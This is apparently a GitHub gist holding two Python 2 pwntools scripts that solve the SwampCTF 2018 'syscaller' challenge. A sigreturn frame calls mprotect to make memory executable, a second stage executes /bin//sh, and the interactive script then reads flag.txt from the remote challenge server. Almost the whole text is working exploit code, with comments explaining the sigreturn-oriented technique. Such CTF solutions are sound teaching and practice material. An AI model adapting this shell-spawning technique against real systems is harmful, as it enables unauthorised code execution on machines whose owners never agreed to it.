@wideglide
Created April 1, 2018 04:15
Syscaller's Lament (swampctf-pwn)
# Offline payload generator for the "syscaller" challenge: the raw exploit
# bytes are written to stdout so they can be piped into the target binary.
# This is Python 2 code (str is a byte string), so str(f) below yields the raw
# bytes of the frame rather than a repr.
from pwn import *
import sys
from struct import pack
# challenge specific
FILE = './syscaller'  # not used by this stdout variant (kept for parity with the interactive script)
SVR = 'chal1.swampctf.com'  # not used by this variant
PORT = 1800  # not used by this variant
# set up environ
level= ['debug','info','error'][1]  # index 1 -> 'info'
context(arch='amd64',os='linux',log_level=level)  # arch matters: SigreturnFrame() builds an amd64 frame
context.terminal = ["terminator", "-e"]
# context.terminal = ['tmux', 'splitw', '-h']
# Stage 1: a 64-byte block of eight little-endian qwords. The label on the next
# comment line is the author's register order for this block (RDI is listed
# twice as written -- presumably the target's own register-load order; verify
# against the binary's disassembly). Only the 4th slot, RAX, is non-zero.
# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
RAX = 0xf # labelled "sigaction" by the author; on amd64 0xf is rt_sigreturn (rt_sigaction is 0xd), which is what restores the frame sent next
initial_stack = pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0)
sys.stdout.write(initial_stack)
# Stage 2: the signal frame that rt_sigreturn restores. The register values
# make the restored context perform mprotect(0x400000, 0x2000, 7) and resume
# at RIP = 0x400104 with RSP = 0x400400.
f = SigreturnFrame()
f.rax = 0xa # rax = mprotect syscall (0xa on amd64)
f.rdi = 0x400000 # start address of the region
f.rsi = 0x2000 # len of the region
f.rdx = 7 # prot: rwx
f.rip = 0x400104 # program counter after the restore
f.rsp = 0x400400 # new stack location after the restore
sys.stdout.write(str(f))
# Pad so that stage 1 (8*8 bytes) + the frame + padding total exactly 512
# bytes -- presumably the size of the target's first read; confirm against the
# binary.
sys.stdout.write("A" * (512 - (len(str(f))+8*8)))
# Stage 3: a second register block, same layout as stage 1, that performs
# execve("/bin//sh", ["/bin//sh", 0], 0). The two addresses below must point
# at the bytes appended right after this block (the argv array, then the
# string) -- which assumes the target places those bytes at 0x400440 onward;
# NOTE(review): that placement is not visible here, confirm it.
# send execve("/bin//sh",["/bin//sh",0],0)
# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
RAX = 59 # execve (59 on amd64)
RDX = 0 # NULL envp
RSI = 0x400440 # rsi => ["/bin//sh",0]  (argv array written below)
RDI = 0x400450 # rdi => "/bin//sh"      (pathname written below)
sys.stdout.write( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
# argv array at 0x400440: pointer to the string, then a NULL terminator.
sys.stdout.write( pack("<QQ",0x400450,0) )
# The pathname at 0x400450 is exactly 8 bytes ("/bin//sh"), so it fills one
# qword; the zero qword that follows NUL-terminates it.
sys.stdout.write("/bin//sh")
sys.stdout.write( pack("<Q",0))
# Interactive variant of the "syscaller" payload: the same three stages as the
# stdout generator, but delivered over a pwntools tube (local process or the
# remote service) with a receive in between. Python 2 code: the print
# statement and str-as-bytes payloads are relied on throughout.
from pwn import *
import argparse
from struct import pack
# challenge specific
FILE = './syscaller'  # local binary used when -r is not given
SVR = 'chal1.swampctf.com'
PORT = 1800
# set up environ
parser = argparse.ArgumentParser()
parser.add_argument('-r', dest='remote', action='store_true',default=False,help='run remotely')
parser.add_argument('-d', dest='debug', action='store_true',default=False,help='debug in GDB')
args = parser.parse_args()
level= ['debug','info','error'][1]  # index 1 -> 'info'
context(arch='amd64',os='linux',log_level=level)  # arch matters: SigreturnFrame() builds an amd64 frame
context.terminal = ["terminator", "-e"]
# context.terminal = ['tmux', 'splitw', '-h']
# Choose the tube: remote service with -r, otherwise a local process.
if args.remote:
r = remote(SVR, PORT)
else:
r = process(FILE)
# GDB is attached only for a local run; -d has no effect together with -r.
if args.debug and not args.remote:
gdb.attach(r)
# Stage 1: a 64-byte block of eight little-endian qwords. The label on the next
# comment line is the author's register order for this block (RDI is listed
# twice as written -- presumably the target's own register-load order; verify
# against the binary's disassembly). Only the 4th slot, RAX, is non-zero.
# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
RAX = 0xf # labelled "sigaction" by the author; on amd64 0xf is rt_sigreturn (rt_sigaction is 0xd), which is what restores the frame sent next
r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,0,0,0) )
# Stage 2: the signal frame that rt_sigreturn restores. The register values
# make the restored context perform mprotect(0x400000, 0x2000, 7) and resume
# at RIP = 0x400104 with RSP = 0x400400.
f = SigreturnFrame()
f.rax = 0xa # rax = mprotect syscall (0xa on amd64)
f.rdi = 0x400000 # start address of the region
f.rsi = 0x2000 # len of the region
f.rdx = 7 # prot: rwx
f.rip = 0x400104 # program counter after the restore
f.rsp = 0x400400 # new stack location after the restore
r.send(str(f))
# Pad so that stage 1 (8*8 bytes) + the frame + padding total exactly 512
# bytes -- presumably the size of the target's first read; confirm against the
# binary.
r.send("A" * (512 - (len(str(f))+8*8)))
# Python 2 print statement. recv() returns whatever has arrived so far in one
# read, so this is a best-effort look at the target's output, not a sync point.
print r.recv()
# Stage 3: a second register block, same layout as stage 1, that performs
# execve("/bin//sh", ["/bin//sh", 0], 0). The two addresses below must point
# at the bytes sent right after this block (the argv array, then the string)
# -- which assumes the target places those bytes at 0x400440 onward;
# NOTE(review): that placement is not visible here, confirm it.
# send execve("/bin//sh",["/bin//sh",0],0)
# R12,R11,RDI,RAX,RBX,RDX,RSI,RDI
RAX = 59 # execve (59 on amd64)
RDX = 0 # NULL envp
RSI = 0x400440 # rsi => ["/bin//sh",0]  (argv array sent below)
RDI = 0x400450 # rdi => "/bin//sh"      (pathname sent below)
r.send( pack("<QQQQQQQQ",0,0,0,RAX,0,RDX,RSI,RDI) )
# argv array at 0x400440: pointer to the string, then a NULL terminator.
r.send( pack("<QQ",0x400450,0) )
# The pathname at 0x400450 is exactly 8 bytes ("/bin//sh"), so it fills one
# qword; the zero qword that follows NUL-terminates it.
r.send("/bin//sh")
r.send( pack("<Q",0))
# Trailing newline before the first shell command; its purpose is not evident
# from this script -- presumably it terminates the target's last read. Confirm.
r.send('\n')
# Command for the spawned shell; the single recv() may return only part of
# its output.
r.send("cat flag.txt\n")
print r.recv()